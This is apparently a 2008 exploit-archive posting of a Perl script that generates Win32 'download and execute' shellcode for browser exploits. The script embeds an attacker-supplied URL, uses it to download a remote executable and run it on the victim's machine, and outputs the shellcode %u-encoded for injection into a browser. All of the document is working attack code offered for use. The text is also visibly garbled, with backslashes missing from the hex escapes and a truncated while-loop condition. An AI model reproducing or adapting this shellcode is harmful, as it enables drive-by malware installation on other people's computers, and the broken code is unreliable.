Download and Execute Shellcode 270 bytes

Win32 Download and Execute Shellcode Generator (browsers edition) 270 bytes：

2008-03-14 win32 Download and Execute Shellcode Generator (browsers edition) 48697 R  D   YAG KOHHA 

#!/usr/bin/perl

$loading_url=$ARGV[0];
chomp ($loading_url);
my @buffer;

if ($loading_url eq "") {
$sco = 'ERROR!!! Enter url to remote exe.';
buffer_gen($sco);
print @buffer;
exit;
}

$c= generate_char(0);

$sco= "xE8x56x00x00x00x53x55x56x57x8Bx6Cx24x18x8Bx45".
      "x3Cx8Bx54x05x78x01xEAx8Bx4Ax18x8Bx5Ax20x01xEB".
      "xE3x32x49x8Bx34x8Bx01xEEx31xFFxFCx31xC0xACx38".
      "xE0x74x07xC1xCFx0Dx01xC7xEBxF2x3Bx7Cx24x14x75".
      "xE1x8Bx5Ax24x01xEBx66x8Bx0Cx4Bx8Bx5Ax1Cx01xEB".
      "x8Bx04x8Bx01xE8xEBx02x31xC0x5Fx5Ex5Dx5BxC2x08".
      "x00x5Ex6Ax30x59x64x8Bx19x8Bx5Bx0Cx8Bx5Bx1Cx8B".
      "x1Bx8Bx5Bx08x53x68x8Ex4Ex0ExECxFFxD6x89xC7x53".
      "x68x8Ex4Ex0ExECxFFxD6xEBx50x5Ax52xFFxD0x89xC2".
      "x52x52x53x68xAAxFCx0Dx7CxFFxD6x5AxEBx4Dx59x51".
      "x52xFFxD0xEBx72x5AxEBx5Bx59x6Ax00x6Ax00x51x52".
      "x6Ax00xFFxD0x53x68xA0xD5xC9x4DxFFxD6x5Ax52xFF".
      "xD0x53x68x98xFEx8Ax0ExFFxD6xEBx44x59x6Ax00x51".
      "xFFxD0x53x68x7ExD8xE2x73xFFxD6x6Ax00xFFxD0xE8".
      "xABxFFxFFxFFx75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00".
      "xE8xAExFFxFFxFFx55x52x4Cx44x6Fx77x6Ex6Cx6Fx61".
      "x64x54x6Fx46x69x6Cx65x41x00xE8xA0xFFxFFxFFx2E".
      "x2Ex5C".$c."x00xE8xB7xFFxFFxFFx2Ex2Ex5C".$c."x00".
      "xE8x89xFFxFFxFF".$loading_url."x00";

$sco=convert_sco($sco);
buffer_gen($sco);
print @buffer;

sub generate_char()
{
 my $wdsize = shift;
 my @alphanumeric = ('a'..'z');
 my $wd = join '',
 map $alphanumeric[rand @alphanumeric], 0..$wdsize;
  return $wd;
}

sub convert_sco {
        my $data = shift;
        my $mode = shift() || 'LE';
        my $code = '';

        my $idx = 0;

        if (length($data) % 2 != 0) {
                $data .= substr($data, -1, 1);
        }

        while ($idx
                my $c1 = ord(substr($data, $idx, 1));
                my $c2 = ord(substr($data, $idx+1, 1));
                if ($mode eq 'LE') {
                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
                } else {
                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
                }
                $idx += 2;
        }

        return $code;
}

sub buffer_gen(){
$sco = shift;
@buffer=

    Win32 Download and Execute Shellcode Generator (browsers edition)
    Size: 275 bytes + loading_url
    Author: Yag Kohha (skyhole [at] gmail.com)
   
    Usage: ./sco http://remote_server/loader.exe
   
    Greetz to:
     str0ke & milw0rm project
     shinnai
     h07
     rgod
     H.D. Moor & Metaspl0it
     offtopic
     3APA3A
   
-------> Start

$sco

-------> End
FX

}

# milw0rm.com [2008-03-14]